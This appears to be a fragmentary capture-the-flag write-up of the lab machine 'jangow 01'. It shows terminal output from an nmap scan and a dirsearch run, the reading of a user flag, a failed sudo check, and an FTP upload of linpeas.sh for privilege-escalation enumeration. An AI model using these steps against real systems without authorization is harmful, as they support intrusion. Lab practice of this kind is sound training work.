Posted by axlfpe on
2025-06-22
Estimated Reading Time 7 Minutes
Words 1.5k In Total
Viewed Times
jangow 01
攻击机ip:192.168.108.50
靶机ip: 192.168.108.140
1 2 3 4 5 6 7 8 9 10 11 12
Kal ddddx ~ ❯ export ip=192.168.108.140 Kal ddddx ~ ❯ nmap $ip ✘ INT took 23s at 16:26:01 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-19 16:26 CST Nmap scan report for 192.168.108.140 Host is up (0.00090s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE 21/tcp open ftp 80/tcp open http MAC Address: 08:00:27:7C:E9:C5 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 4.98 seconds
Kal ddddx ~ ❯ dirsearch -u http://192.168.108.140/site/ -w /usr/share/wordlists/dirb/big.txt took 10s at 08:28:30 /home/ddddx/tools/dirsearch/lib/core/installation.py:24: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. import pkg_resources
jangow01@jangow01:~$ ls user.txt jangow01@jangow01:~$ cat user.txt d41d8cd98f00b204e9800998ecf8427e
1 2 3 4
jangow01@jangow01:/bin$ sudo -l sudo: não foi possível resolver máquina jangow01: Conexão recusada [sudo] senha para jangow01: Sinto muito, usuário jangow01 não pode executar sudo em jangow01.
1 2 3 4 5 6 7
ftp> put linpeas.sh local: linpeas.sh remote: linpeas.sh 229 Entering Extended Passive Mode (|||59048|) 150 Ok to send data. 100% |**************| 820 KiB 36.18 MiB/s 00:00 ETA 226 Transfer complete. 840082 bytes sent in 00:00 (30.82 MiB/s)